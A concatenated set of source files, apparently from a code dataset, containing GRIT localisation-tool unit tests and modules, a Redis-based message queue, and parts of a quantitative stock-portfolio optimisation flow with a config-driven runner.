' <decimal id="SampleIntPolicy" valueName="SampleIntPolicy"/>\n'
' </elements>\n'
'</policy>')
self.AssertXMLEquals(output, expected_output)
def testIntEnumPolicy(self):
enum_policy = {
'name': 'SampleEnumPolicy',
'type': 'int-enum',
'items': [
{'name': 'item_1', 'value': 0},
{'name': 'item_2', 'value': 1},
]
}
self._initWriterForPolicy(self.writer, enum_policy)
self.writer.WritePolicy(enum_policy)
output = self.GetXMLOfChildren(self._GetPoliciesElement(self.writer._doc))
expected_output = (
'<policy class="TestClass" displayName="$(string.SampleEnumPolicy)"'
' explainText="$(string.SampleEnumPolicy_Explain)"'
' key="Software\\Policies\\Test" name="SampleEnumPolicy"'
' presentation="$(presentation.SampleEnumPolicy)">\n'
' <parentCategory ref="PolicyGroup"/>\n'
' <supportedOn ref="SUPPORTED_TESTOS"/>\n'
' <elements>\n'
' <enum id="SampleEnumPolicy" valueName="SampleEnumPolicy">\n'
' <item displayName="$(string.item_1)">\n'
' <value>\n'
' <decimal value="0"/>\n'
' </value>\n'
' </item>\n'
' <item displayName="$(string.item_2)">\n'
' <value>\n'
' <decimal value="1"/>\n'
' </value>\n'
' </item>\n'
' </enum>\n'
' </elements>\n'
'</policy>')
self.AssertXMLEquals(output, expected_output)
def testStringEnumPolicy(self):
enum_policy = {
'name': 'SampleEnumPolicy',
'type': 'string-enum',
'items': [
{'name': 'item_1', 'value': 'one'},
{'name': 'item_2', 'value': 'two'},
]
}
# This test is different than the others because it also tests that space
# usage inside <string> nodes is correct.
dom_impl = minidom.getDOMImplementation('')
self.writer._doc = dom_impl.createDocument(None, 'policyDefinitions', None)
self.writer._active_policies_elem = self.writer._doc.documentElement
self.writer._active_mandatory_policy_group_name = 'PolicyGroup'
self.writer.WritePolicy(enum_policy)
output = self.writer.GetTemplateText()
expected_output = (
'<?xml version="1.0" ?>\n'
'<policyDefinitions>\n'
' <policy class="TestClass" displayName="$(string.SampleEnumPolicy)"'
' explainText="$(string.SampleEnumPolicy_Explain)"'
' key="Software\\Policies\\Test" name="SampleEnumPolicy"'
' presentation="$(presentation.SampleEnumPolicy)">\n'
' <parentCategory ref="PolicyGroup"/>\n'
' <supportedOn ref="SUPPORTED_TESTOS"/>\n'
' <elements>\n'
' <enum id="SampleEnumPolicy" valueName="SampleEnumPolicy">\n'
' <item displayName="$(string.item_1)">\n'
' <value>\n'
' <string>one</string>\n'
' </value>\n'
' </item>\n'
' <item displayName="$(string.item_2)">\n'
' <value>\n'
' <string>two</string>\n'
' </value>\n'
' </item>\n'
' </enum>\n'
' </elements>\n'
' </policy>\n'
'</policyDefinitions>')
self.AssertXMLEquals(output, expected_output)
def testListPolicy(self):
list_policy = {
'name': 'SampleListPolicy',
'type': 'list',
}
self._initWriterForPolicy(self.writer, list_policy)
self.writer.WritePolicy(list_policy)
output = self.GetXMLOfChildren(self._GetPoliciesElement(self.writer._doc))
expected_output = (
'<policy class="TestClass" displayName="$(string.SampleListPolicy)"'
' explainText="$(string.SampleListPolicy_Explain)"'
' key="Software\\Policies\\Test" name="SampleListPolicy"'
' presentation="$(presentation.SampleListPolicy)">\n'
' <parentCategory ref="PolicyGroup"/>\n'
' <supportedOn ref="SUPPORTED_TESTOS"/>\n'
' <elements>\n'
' <list id="SampleListPolicyDesc"'
' key="Software\Policies\Test\SampleListPolicy" valuePrefix=""/>\n'
' </elements>\n'
'</policy>')
self.AssertXMLEquals(output, expected_output)
def testDictionaryPolicy(self):
dict_policy = {
'name': 'SampleDictionaryPolicy',
'type': 'dict',
}
self._initWriterForPolicy(self.writer, dict_policy)
self.writer.WritePolicy(dict_policy)
output = self.GetXMLOfChildren(self._GetPoliciesElement(self.writer._doc))
expected_output = (
'<policy class="TestClass" displayName="$(string.'
'SampleDictionaryPolicy)"'
' explainText="$(string.SampleDictionaryPolicy_Explain)"'
' key="Software\\Policies\\Test" name="SampleDictionaryPolicy"'
' presentation="$(presentation.SampleDictionaryPolicy)">\n'
' <parentCategory ref="PolicyGroup"/>\n'
' <supportedOn ref="SUPPORTED_TESTOS"/>\n'
' <elements>\n'
' <text id="SampleDictionaryPolicy" '
'valueName="SampleDictionaryPolicy"/>\n'
' </elements>\n'
'</policy>')
self.AssertXMLEquals(output, expected_output)
def testPlatform(self):
# Test that the writer correctly chooses policies of platform Windows.
self.assertTrue(self.writer.IsPolicySupported({
'supported_on': [
{'platforms': ['win', 'zzz']}, {'platforms': ['aaa']}
]
}))
self.assertFalse(self.writer.IsPolicySupported({
'supported_on': [
{'platforms': ['mac', 'linux']}, {'platforms': ['aaa']}
]
}))
if __name__ == '__main__':
unittest.main()
```
#### File: grit/format/resource_map.py
```python
import os
from grit import util
from grit.format import interface
def GetMapName(root):
'''Get the name of the resource map based on the header file name. E.g.,
if our header filename is theme_resources.h, we name our resource map
kThemeResourcesMap.
|root| is the grd file root.'''
outputs = root.GetOutputFiles()
rc_header_file = None
for output in outputs:
if 'rc_header' == output.GetType():
rc_header_file = output.GetFilename()
if not rc_header_file:
raise Exception('unable to find resource header filename')
filename = os.path.splitext(os.path.split(rc_header_file)[1])[0]
filename = filename[0].upper() + filename[1:]
while filename.find('_') != -1:
pos = filename.find('_')
    if pos + 1 >= len(filename):
break
filename = filename[:pos] + filename[pos + 1].upper() + filename[pos + 2:]
return 'k' + filename
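# Worked example (illustrative, not part of the original module), tracing GetMapName:
#   'theme_resources.h' -> splitext -> 'theme_resources' -> first letter upper-cased
#   -> 'Theme_resources' -> underscores removed, the following letter upper-cased
#   -> 'ThemeResources' -> prefixed with 'k' -> 'kThemeResources'.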
class HeaderTopLevel(interface.ItemFormatter):
'''Create the header file for the resource mapping. This file just declares
an array of name/value pairs.'''
def Format(self, item, lang='en', output_dir='.'):
return '''\
// Copyright (c) %(year)d The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
// This file is automatically generated by GRIT. Do not edit.
#include <stddef.h>
#ifndef GRIT_RESOURCE_MAP_STRUCT_
#define GRIT_RESOURCE_MAP_STRUCT_
struct GritResourceMap {
const char* const name;
int value;
};
#endif // GRIT_RESOURCE_MAP_STRUCT_
extern const GritResourceMap %(map_name)s[];
extern const size_t %(map_name)sSize;
''' % { 'year': util.GetCurrentYear(),
'map_name': GetMapName(item.GetRoot()),
}
class SourceTopLevel(interface.ItemFormatter):
'''Create the C++ source file for the resource mapping. This class handles
the header/footer of the file.'''
def Format(self, item, lang='en', output_dir='.'):
grit_root = item.GetRoot()
outputs = grit_root.GetOutputFiles()
rc_header_file = None
map_header_file = None
for output in outputs:
if 'rc_header' == output.GetType():
rc_header_file = output.GetFilename()
elif 'resource_map_header' == output.GetType():
map_header_file = output.GetFilename()
if not rc_header_file or not map_header_file:
raise Exception('resource_map_source output type requires '
'resource_map_header and rc_header outputs')
return '''\
// Copyright (c) %(year)d The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
// This file is automatically generated by GRIT. Do not edit.
#include "%(map_header_file)s"
#include "base/basictypes.h"
#include "%(rc_header_file)s"
const GritResourceMap %(map_name)s[] = {
''' % { 'year': util.GetCurrentYear(),
'map_header_file': map_header_file,
'rc_header_file': rc_header_file,
'map_name': GetMapName(item.GetRoot()),
}
def FormatEnd(self, item, lang='en', output_dir='.'):
# Return the footer text.
return '''\
};
const size_t %(map_name)sSize = arraysize(%(map_name)s);
''' % { 'map_name': GetMapName(item.GetRoot()) }
class SourceInclude(interface.ItemFormatter):
'''Populate the resource mapping. For each include, we map a string to
the resource ID.'''
def Format(self, item, lang='en', output_dir='.'):
return ' {"%s", %s},\n' % (item.attrs['name'], item.attrs['name'])
class SourceFileInclude(interface.ItemFormatter):
'''Populate the resource mapping. For each include, we map a filename to
the resource ID.'''
def Format(self, item, lang='en', output_dir='.'):
filename = item.attrs['file'].replace("\\", "/")
return ' {"%s", %s},\n' % (filename, item.attrs['name'])
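# Illustrative note (not part of the original module): for a hypothetical
# <include name="IDR_EXAMPLE" file="example\page.html" ...> node, SourceInclude.Format
# emits a row like '{"IDR_EXAMPLE", IDR_EXAMPLE},' while SourceFileInclude.Format
# emits '{"example/page.html", IDR_EXAMPLE},' (backslashes in the path are
# normalized to forward slashes).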
```
#### File: grit/node/io_unittest.py
```python
import os
import sys
if __name__ == '__main__':
sys.path.append(os.path.join(os.path.dirname(sys.argv[0]), '../..'))
import os
import StringIO
import unittest
from grit.node import misc
from grit.node import io
from grit.node import empty
from grit import grd_reader
from grit import util
class FileNodeUnittest(unittest.TestCase):
def testGetPath(self):
root = misc.GritNode()
root.StartParsing(u'grit', None)
root.HandleAttribute(u'latest_public_release', u'0')
root.HandleAttribute(u'current_release', u'1')
root.HandleAttribute(u'base_dir', ur'..\resource')
translations = empty.TranslationsNode()
translations.StartParsing(u'translations', root)
root.AddChild(translations)
file_node = io.FileNode()
file_node.StartParsing(u'file', translations)
file_node.HandleAttribute(u'path', ur'flugel\kugel.pdf')
translations.AddChild(file_node)
root.EndParsing()
self.failUnless(file_node.GetFilePath() ==
util.normpath(
os.path.join(ur'../resource', ur'flugel/kugel.pdf')))
def VerifyCliquesContainEnglishAndFrenchAndNothingElse(self, cliques):
for clique in cliques:
self.failUnlessEquals(len(clique[0].clique), 2)
      self.failUnless('en' in clique[0].clique)
      self.failUnless('fr' in clique[0].clique)
def testLoadTranslations(self):
xml = '''<?xml version="1.0" encoding="UTF-8"?>
<grit latest_public_release="2" source_lang_id="en-US" current_release="3" base_dir=".">
<translations>
<file path="generated_resources_fr.xtb" lang="fr" />
</translations>
<release seq="3">
<messages>
<message name="ID_HELLO">Hello!</message>
<message name="ID_HELLO_USER">Hello <ph name="USERNAME">%s<ex>Joi</ex></ph></message>
</messages>
</release>
</grit>'''
grd = grd_reader.Parse(StringIO.StringIO(xml),
util.PathFromRoot('grit/testdata'))
grd.SetOutputContext('en', {})
grd.RunGatherers(recursive=True)
self.VerifyCliquesContainEnglishAndFrenchAndNothingElse(grd.GetCliques())
def testIffyness(self):
grd = grd_reader.Parse(StringIO.StringIO('''<?xml version="1.0" encoding="UTF-8"?>
<grit latest_public_release="2" source_lang_id="en-US" current_release="3" base_dir=".">
<translations>
<if expr="lang == 'fr'">
<file path="generated_resources_fr.xtb" lang="fr" />
</if>
</translations>
<release seq="3">
<messages>
<message name="ID_HELLO">Hello!</message>
<message name="ID_HELLO_USER">Hello <ph name="USERNAME">%s<ex>Joi</ex></ph></message>
</messages>
</release>
</grit>'''), util.PathFromRoot('grit/testdata'))
grd.SetOutputContext('en', {})
grd.RunGatherers(recursive=True)
grd.SetOutputContext('fr', {})
grd.RunGatherers(recursive=True)
def testConditionalLoadTranslations(self):
xml = '''<?xml version="1.0" encoding="UTF-8"?>
<grit latest_public_release="2" source_lang_id="en-US" current_release="3"
base_dir=".">
<translations>
<if expr="True">
<file path="generated_resources_fr.xtb" lang="fr" />
</if>
<if expr="False">
<file path="no_such_file.xtb" lang="de" />
</if>
</translations>
<release seq="3">
<messages>
<message name="ID_HELLO">Hello!</message>
<message name="ID_HELLO_USER">Hello <ph name="USERNAME">%s<ex>
Joi</ex></ph></message>
</messages>
</release>
</grit>'''
grd = grd_reader.Parse(StringIO.StringIO(xml),
util.PathFromRoot('grit/testdata'))
grd.SetOutputContext('en', {})
grd.RunGatherers(recursive=True)
self.VerifyCliquesContainEnglishAndFrenchAndNothingElse(grd.GetCliques())
def testConditionalOutput(self):
xml = '''<?xml version="1.0" encoding="UTF-8"?>
<grit latest_public_release="2" source_lang_id="en-US" current_release="3"
base_dir=".">
<outputs>
<output filename="resource.h" type="rc_header" />
<output filename="en/generated_resources.rc" type="rc_all"
lang="en" />
<if expr="pp_if('NOT_TRUE')">
<output filename="de/generated_resources.rc" type="rc_all"
lang="de" />
</if>
</outputs>
<release seq="3">
<messages>
<message name="ID_HELLO">Hello!</message>
</messages>
</release>
</grit>'''
grd = grd_reader.Parse(StringIO.StringIO(xml),
util.PathFromRoot('grit/test/data'))
grd.SetOutputContext('en', {})
grd.RunGatherers(recursive=True)
outputs = grd.GetChildrenOfType(io.OutputNode)
self.failUnless(outputs[0].SatisfiesOutputCondition())
self.failUnless(outputs[0].GetType() == 'rc_header')
self.failUnless(outputs[1].SatisfiesOutputCondition())
self.failUnless(outputs[1].GetType() == 'rc_all')
self.failUnless(not outputs[2].SatisfiesOutputCondition())
self.failUnless(outputs[2].GetType() ==
'output_condition_not_satisfied_rc_all')
if __name__ == '__main__':
unittest.main()
```
#### File: grit/tool/preprocess_unittest.py
```python
import os
import sys
if __name__ == '__main__':
sys.path.append(os.path.join(os.path.dirname(sys.argv[0]), '../..'))
import unittest
import grit.tool.preprocess_interface
from grit.tool import rc2grd
class PreProcessingUnittest(unittest.TestCase):
def testPreProcessing(self):
tool = rc2grd.Rc2Grd()
class DummyOpts(object):
verbose = False
extra_verbose = False
tool.o = DummyOpts()
tool.pre_process = 'grit.tool.preprocess_unittest.DummyPreProcessor'
    result = tool.Process('', r'.\resource.rc')
self.failUnless(
result.children[2].children[2].children[0].attrs['name'] == 'DUMMY_STRING_1')
class DummyPreProcessor(grit.tool.preprocess_interface.PreProcessor):
def Process(self, rctext, rcpath):
rctext = '''STRINGTABLE
BEGIN
DUMMY_STRING_1 "String 1"
// Some random description
DUMMY_STRING_2 "This text was added during preprocessing"
END
'''
return rctext
if __name__ == '__main__':
unittest.main()
```
#### File: grit/tool/toolbar_postprocess.py
```python
import sys
import re
import postprocess_interface
from grit import lazy_re
import grit.node.empty
from grit.node import misc
class ToolbarPostProcessor(postprocess_interface.PostProcessor):
''' Defines message groups within the grd file for each of the
IDS_COMMAND stuff.
'''
_IDS_COMMAND = lazy_re.compile(r'IDS_COMMAND_')
_GRAB_PARAMETERS = lazy_re.compile(
      r'(IDS_COMMAND_[a-zA-Z0-9]+)_([a-zA-Z0-9]+)')
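  # Illustrative note (not part of the original class): for a hypothetical message
  # named IDS_COMMAND_PRINT_TIP the regex above captures ('IDS_COMMAND_PRINT', 'TIP'),
  # so messages sharing an IDS_COMMAND_<name> prefix are regrouped below into a
  # dedicated <messages> node whose entries carry offsets such as PCI_TIP.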
def Process(self, rctext, rcpath, grdnode):
''' Processes the data in rctext and grdnode.
Args:
rctext: string containing the contents of the RC file being processed.
rcpath: the path used to access the file.
grdnode: the root node of the grd xml data generated by
the rc2grd tool.
Return:
The root node of the processed GRD tree.
'''
release = grdnode.children[2]
messages = release.children[2]
identifiers = grit.node.empty.IdentifiersNode()
identifiers.StartParsing('identifiers', release)
identifiers.EndParsing()
release.AddChild(identifiers)
#
# Turn the IDS_COMMAND messages into separate message groups
    # with ids that are offset from the message group's first id
#
previous_name_attr = ''
previous_prefix = ''
previous_node = ''
new_messages_node = self.ConstructNewMessages(release)
for node in messages.children[:]:
name_attr = node.attrs['name']
if self._IDS_COMMAND.search(name_attr):
mo = self._GRAB_PARAMETERS.search(name_attr)
mp = self._GRAB_PARAMETERS.search(previous_name_attr)
if mo and mp:
prefix = mo.group(1)
previous_prefix = mp.group(1)
new_message_id = mp.group(2)
if prefix == previous_prefix:
messages.RemoveChild(previous_name_attr)
previous_node.attrs['offset'] = 'PCI_' + new_message_id
del previous_node.attrs['name']
new_messages_node.AddChild(previous_node)
else:
messages.RemoveChild(previous_name_attr)
previous_node.attrs['offset'] = 'PCI_' + new_message_id
del previous_node.attrs['name']
new_messages_node.AddChild(previous_node)
new_messages_node.attrs['first_id'] = previous_prefix
new_messages_node = self.ConstructNewMessages(release)
else:
if self._IDS_COMMAND.search(previous_name_attr):
messages.RemoveChild(previous_name_attr)
previous_prefix = mp.group(1)
new_message_id = mp.group(2)
previous_node.attrs['offset'] = 'PCI_' + new_message_id
del previous_node.attrs['name']
new_messages_node.AddChild(previous_node)
new_messages_node.attrs['first_id'] = previous_prefix
new_messages_node = self.ConstructNewMessages(release)
else:
if self._IDS_COMMAND.search(previous_name_attr):
messages.RemoveChild(previous_name_attr)
mp = self._GRAB_PARAMETERS.search(previous_name_attr)
previous_prefix = mp.group(1)
new_message_id = mp.group(2)
previous_node.attrs['offset'] = 'PCI_' + new_message_id
del previous_node.attrs['name']
new_messages_node.AddChild(previous_node)
new_messages_node.attrs['first_id'] = previous_prefix
new_messages_node = self.ConstructNewMessages(release)
previous_name_attr = name_attr
previous_node = node
self.AddIdentifiers(rctext, identifiers)
return grdnode
def ConstructNewMessages(self, parent):
new_node = grit.node.empty.MessagesNode()
new_node.StartParsing('messages', parent)
new_node.EndParsing()
parent.AddChild(new_node)
return new_node
def AddIdentifiers(self, rctext, node):
node.AddChild(misc.IdentifierNode.Construct(node, 'IDS_COMMAND_gcFirst', '12000', ''))
node.AddChild(misc.IdentifierNode.Construct(node,
'IDS_COMMAND_PCI_SPACE', '16', ''))
node.AddChild(misc.IdentifierNode.Construct(node, 'PCI_BUTTON', '0', ''))
node.AddChild(misc.IdentifierNode.Construct(node, 'PCI_MENU', '1', ''))
node.AddChild(misc.IdentifierNode.Construct(node, 'PCI_TIP', '2', ''))
node.AddChild(misc.IdentifierNode.Construct(node, 'PCI_OPTIONS_TEXT', '3', ''))
node.AddChild(misc.IdentifierNode.Construct(node, 'PCI_TIP_DISABLED', '4', ''))
node.AddChild(misc.IdentifierNode.Construct(node, 'PCI_TIP_MENU', '5', ''))
node.AddChild(misc.IdentifierNode.Construct(node, 'PCI_TIP_MENU_DISABLED', '6', ''))
node.AddChild(misc.IdentifierNode.Construct(node, 'PCI_TIP_OPTIONS', '7', ''))
node.AddChild(misc.IdentifierNode.Construct(node, 'PCI_TIP_OPTIONS_DISABLED', '8', ''))
node.AddChild(misc.IdentifierNode.Construct(node,
'PCI_TIP_DISABLED_BY_POLICY', '9', ''))
```
#### File: grit/grit/util_unittest.py
```python
import os
import sys
if __name__ == '__main__':
sys.path.append(os.path.join(os.path.dirname(sys.argv[0]), '..'))
import unittest
from grit import util
class UtilUnittest(unittest.TestCase):
''' Tests functions from util
'''
def testNewClassInstance(self):
# Test short class name with no fully qualified package name
# Should fail, it is not supported by the function now (as documented)
cls = util.NewClassInstance('grit.util.TestClassToLoad',
TestBaseClassToLoad)
self.failUnless(cls == None)
# Test non existent class name
cls = util.NewClassInstance('grit.util_unittest.NotExistingClass',
TestBaseClassToLoad)
self.failUnless(cls == None)
# Test valid class name and valid base class
cls = util.NewClassInstance('grit.util_unittest.TestClassToLoad',
TestBaseClassToLoad)
self.failUnless(isinstance(cls, TestBaseClassToLoad))
# Test valid class name with wrong hierarchy
cls = util.NewClassInstance('grit.util_unittest.TestClassNoBase',
TestBaseClassToLoad)
self.failUnless(cls == None)
def testCanonicalLanguage(self):
self.failUnless(util.CanonicalLanguage('en') == 'en')
self.failUnless(util.CanonicalLanguage('pt_br') == 'pt-BR')
self.failUnless(util.CanonicalLanguage('pt-br') == 'pt-BR')
self.failUnless(util.CanonicalLanguage('pt-BR') == 'pt-BR')
self.failUnless(util.CanonicalLanguage('pt/br') == 'pt-BR')
self.failUnless(util.CanonicalLanguage('pt/BR') == 'pt-BR')
self.failUnless(util.CanonicalLanguage('no_no_bokmal') == 'no-NO-BOKMAL')
def testUnescapeHtml(self):
    self.failUnless(util.UnescapeHtml('&#1010;') == unichr(1010))
    self.failUnless(util.UnescapeHtml('&#xABCD;') == unichr(43981))
def testRelativePath(self):
""" Verify that MakeRelativePath works in some tricky cases."""
def TestRelativePathCombinations(base_path, other_path, expected_result):
""" Verify that the relative path function works for
the given paths regardless of whether or not they end with
a trailing slash."""
for path1 in [base_path, base_path + os.path.sep]:
for path2 in [other_path, other_path + os.path.sep]:
result = util.MakeRelativePath(path1, path2)
self.failUnless(result == expected_result)
# set-up variables
root_dir = 'c:%sa' % os.path.sep
result1 = '..%sabc' % os.path.sep
path1 = root_dir + 'bc'
result2 = 'bc'
path2 = '%s%s%s' % (root_dir, os.path.sep, result2)
# run the tests
TestRelativePathCombinations(root_dir, path1, result1)
TestRelativePathCombinations(root_dir, path2, result2)
class TestBaseClassToLoad(object):
pass
class TestClassToLoad(TestBaseClassToLoad):
pass
class TestClassNoBase(object):
pass
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "jokaye/simple-message-queue",
"score": 3
} |
#### File: simple-message-queue/simple_message_queue/message_queue.py
```python
import json
# The queue prefix in redis key.
QUEUE_PREFIX = 'msg_u'
# Max messages count to limited per user.
MAX_QUEUE_SIZE = 1000
# Use a singleton to make sure there is only one queue instance in our system,
# so that redis connections are not abused.
class Singleton(type):
_instance = {}
def __call__(cls, *args, **kwargs):
if cls not in cls._instance:
cls._instance[cls] = super(Singleton, cls).__call__(*args, **kwargs)
return cls._instance[cls]
class MessageQueue(object):
__metaclass__ = Singleton
def __init__(self, redis_ins):
self.queue_ins = redis_ins
def user_key(self, user_id):
return '%s_%s' % (QUEUE_PREFIX, user_id)
def get_messages(self, user_id, page_size):
data = self.queue_ins.lrange(self.user_key(user_id), 0, page_size - 1)
return [json.loads(d) for d in data]
def push_message(self, user_id, message):
"""
        The steps for pushing a message onto the queue:
        First: push the message onto the user's message queue.
        Second: check whether the queue size exceeds the maximum queue size;
        if it does, trim the oldest messages from the queue.
"""
self.queue_ins.rpush(self.user_key(user_id), json.dumps(message))
        current_queue_size = self.queue_ins.llen(self.user_key(user_id))
over_size = current_queue_size - MAX_QUEUE_SIZE
if over_size > 0:
            self.queue_ins.ltrim(self.user_key(user_id), over_size, -1)
return True
def ack_messages(self, user_id, last_position, msg_id):
"""
Through position and msg_id to check exactly position last messages return.
If the message is found, remove the before position messages as read.
"""
data = self.queue_ins.lrange(self.user_key(user_id), last_position - 1, last_position - 1)
if data:
message = json.loads(data[0])
if 'msg_id' in message and message['msg_id'] == msg_id:
self.queue_ins.ltrim(self.user_key(user_id), last_position, -1)
return True
return False
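# --- Usage sketch (illustrative, not part of the original module) ---
# Assumes a redis.StrictRedis-compatible client; the host/port and payload below
# are placeholders.  Because of the Singleton metaclass, constructing MessageQueue
# a second time returns the same instance.
#
#   import redis
#   mq = MessageQueue(redis.StrictRedis(host='localhost', port=6379))
#   mq.push_message(42, {'msg_id': 1, 'body': 'hello'})
#   msgs = mq.get_messages(42, page_size=10)
#   if msgs:
#       mq.ack_messages(42, last_position=len(msgs), msg_id=msgs[-1]['msg_id'])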
``` |
{
"source": "jokbull/benew_model",
"score": 2
} |
#### File: benew_model/flow/flow_optim_v1_forward_return.py
```python
from model.breakdown.Optimization.L1Norm.L1Norm import *
from collider.const import FACTOR_STYLE
from collider.sensor.get_factor_list import FactorList
from collider.utils.data_process import DataProcessing
from sensor.optimization_stock_weight_v2tc import OptimizationStockWeightV2tc
from sensor.get_fundamental_pool_v2 import GetFundamentalPool
from sensor.get_factor_data_v2 import GetFactorData
from sensor.fake_forward_return import FakeForwardReturn
from sensor.save_to_npy import SaveToBundleSensor
class flow_optim_v1_forward_return(L1Norm):
def initialize(self):
# self.user_context.update("pool_name", "pool_01")
self.user_context.update("alphaFactorDataFrame", FactorList(
file=self.user_context.alpha_file,
factor_style=FACTOR_STYLE.ALPHA
))
self.optim_options = {"options": {"show_progress": False},
"tc": 0.003,
"top": 500,
"risk_condition": {
"up": {
'style_size_2': 0.0005,
'style_beta_2': 0.0005,
'industry_商贸零售': 0.03,
'industry_石油石化': 0.03,
'industry_国防军工': 0.03,
'industry_传媒': 0.03,
'industry_餐饮旅游': 0.03,
'industry_汽车': 0.03,
'industry_电力及公用事业': 0.03,
'industry_电力设备': 0.03,
'industry_综合': 0.03,
'industry_计算机': 0.03,
'industry_医药': 0.03,
'industry_建材': 0.03,
'industry_农林牧渔': 0.03,
'industry_机械': 0.03,
'industry_纺织服装': 0.03,
'industry_保险Ⅱ': 0.03,
'industry_食品饮料': 0.03,
'industry_信托及其他': 0.03,
'industry_电子元器件': 0.03,
'industry_煤炭': 0.03,
'industry_建筑': 0.03,
'industry_银行': 0.03,
'industry_基础化工': 0.03,
'industry_证券Ⅱ': 0.03,
'industry_家电': 0.03,
'industry_交通运输': 0.03,
'industry_钢铁': 0.03,
'industry_有色金属': 0.03,
'industry_通信': 0.03,
'industry_轻工制造': 0.03,
'industry_房地产': 0.03
},
"down": {
'style_size_2': 0.0005,
'style_beta_2': 0.0005,
'industry_商贸零售': 0.03,
'industry_石油石化': 0.03,
'industry_国防军工': 0.03,
'industry_传媒': 0.03,
'industry_餐饮旅游': 0.03,
'industry_汽车': 0.03,
'industry_电力及公用事业': 0.03,
'industry_电力设备': 0.03,
'industry_综合': 0.03,
'industry_计算机': 0.03,
'industry_医药': 0.03,
'industry_建材': 0.03,
'industry_农林牧渔': 0.03,
'industry_机械': 0.03,
'industry_纺织服装': 0.03,
'industry_保险Ⅱ': 0.03,
'industry_食品饮料': 0.03,
'industry_信托及其他': 0.03,
'industry_电子元器件': 0.03,
'industry_煤炭': 0.03,
'industry_建筑': 0.03,
'industry_银行': 0.03,
'industry_基础化工': 0.03,
'industry_证券Ⅱ': 0.03,
'industry_家电': 0.03,
'industry_交通运输': 0.03,
'industry_钢铁': 0.03,
'industry_有色金属': 0.03,
'industry_通信': 0.03,
'industry_轻工制造': 0.03,
'industry_房地产': 0.03
}
}}
self.user_context.update("optim_options", {})
return super().initialize()
def _init_optim(self):
prediction_flow = self.user_context.flow_config.get("pred_flow_name", "prediction_stock")
optim_flow = self.user_context.flow_config.get("optim_flow_name", "optim_flow")
forward_return_flow = self.user_context.flow_config.get("forward_return_flow", "flow_forward_return")
self._optim_flow = SensorFlow(name=optim_flow, data_manager=self.user_context.DM)
        # module 19. yesterday's holdings
self._optim_flow.add_next_step(sensor=GetHolding,
args=["holding", [], {}],
kwds={"account": self.account})
self._optim_flow.add_next_step(sensor=GetDate,
args=["factor_as_of_date", [], {}],
kwds={'offset': 1}
)
        # module 11. Determine the stock universe on which the Alpha/Risk data will be cleaned
self._optim_flow.add_next_step(sensor=GetFundamentalPool,
args=["stockCandidate",
[
f"{optim_flow}.holding.weight",
f"{optim_flow}.factor_as_of_date.date"
], {}],
kwds={"pool_name": self.user_context.ff_name,
"threshold": 0.3,
# "benchmark_weight": "weight_index_500"
},
silent=False)
factorList = {}
for k in self.user_context.alphaFactorDataFrame.factor_dataFrame.factor:
factorList[k + "_f1"] = FACTOR_STYLE.ALPHA
        # module 7. Load the alpha factor data
self._optim_flow.add_next_step2(name="alphaPredData",
sensor=GetFactorData,
call=None,
input_var=[
f"{optim_flow}.factor_as_of_date.date"
],
kwds={"factorList": factorList})
        # module 7. Load the true forward-return data
self._optim_flow.add_next_step2(name="forwardReturnData",
sensor=GetFactorData,
call=None,
input_var=[
f"{optim_flow}.factor_as_of_date.date"
],
kwds={"factorList": {'forward_return_5_f1': FACTOR_STYLE.ALPHA}})
        # Add noise to the true forward return
self._optim_flow.add_next_step2(name="fakeForwardReturnData",
sensor=FakeForwardReturn, call=None,
input_var=[
f"{optim_flow}.forwardReturnData.exposure"
],
kwds={})
        # module 8. Load the fitted forward return (this also uses future data)
self._optim_flow.add_next_step2(name="fittedForwardReturnData",
sensor=GetFactorData,
call=None,
input_var=[
f"{optim_flow}.factor_as_of_date.date"
],
kwds={"factorList": {'flow_estimation_fitted_f1': FACTOR_STYLE.ALPHA}})
kwds = {}
kwds.update(self.optim_options)
kwds.update({'total_value': 10000000})
# kwds.update({'tc_b': 5})
# kwds.update({'tc_a': 0.5})
self._optim_flow.add_next_step(sensor=OptimizationStockWeightV2tc,
args=["optimizationStockWeight", [
"%s.fakeForwardReturnData.exposure" % optim_flow,
"%s.predictionFactorCovariance.factorCovariance" % prediction_flow,
"%s.alphaPredData.exposure" % optim_flow,
"%s.alphaPredData.factorName" % optim_flow,
"%s.riskFactorData.exposure" % forward_return_flow,
"%s.riskFactorData.factorName" % forward_return_flow,
"%s.stockCandidate.pool" % optim_flow,
"%s.holding.weight" % optim_flow,
"%s.factor_as_of_date.date" % optim_flow
], {
"%s.alphaPredData.exposure" % optim_flow: "alphaExposure",
"%s.alphaPredData.factorName" % optim_flow: "alphaName",
"%s.riskFactorData.exposure" % forward_return_flow: "riskExposure",
"%s.riskFactorData.factorName" % forward_return_flow: "riskName",
"%s.fakeForwardReturnData.exposure" % optim_flow: 'stockReturn'
}],
kwds=kwds,
silent=True)
self._optim_flow.add_next_step2(name="dumpTargetWeight",
sensor=DumpTargetWeight,
kwds={},
input_var=[f"{optim_flow}.optimizationStockWeight.targetWeight"]
)
```
#### File: jokbull/benew_model/run.py
```python
import click
import os
import codecs
import yaml
from collider import run_class
from collider.utils.logger import system_log
@click.command()
@click.option("-n", "--flow_name", default=None)
@click.option("-f", "--configure_file", default=None)
@click.help_option("-h", "--help")
def cli_run(**kwargs):
run(**kwargs)
def run(**kwargs):
flow_name = kwargs['flow_name']
config_file = kwargs['configure_file']
# if flow_name is None and config_file is None:
# raise AttributeError("Please input flow_name or configure_file")
"""
    When flow_name is given, configure/<flow_name>.yml is looked up and used as the configuration
    by default, overriding any configure_file that was passed in; if neither file exists, an error is raised.
    When flow_name is not given, an error is raised.
"""
if flow_name is not None:
new_config_file = os.path.join("configure", "%s.yml" % flow_name)
if os.path.exists(new_config_file):
if config_file is not None:
system_log.warn("configure_file %s is override by %s" % (config_file, new_config_file))
config_file = new_config_file
elif not os.path.exists(config_file):
raise FileNotFoundError("%s or %s both not found" % (config_file, new_config_file))
else:
raise AttributeError("please input flow_name")
with codecs.open(config_file, encoding="utf-8") as f:
        config = yaml.safe_load(f)
if "fix_config" in kwargs:
config = kwargs["fix_config"](config)
m = __import__('flow.%s' % flow_name, fromlist=True)
flow = getattr(m, flow_name)
result = run_class(flow, config)
print(result)
if __name__ == '__main__':
# run(flow_name="flow_fake_forward_return", configure_file=None)
cli_run()
```
#### File: benew_model/sensor/fake_forward_return.py
```python
from collider.data.sensor import Sensor
from collider.data.message_package import MessagePackage
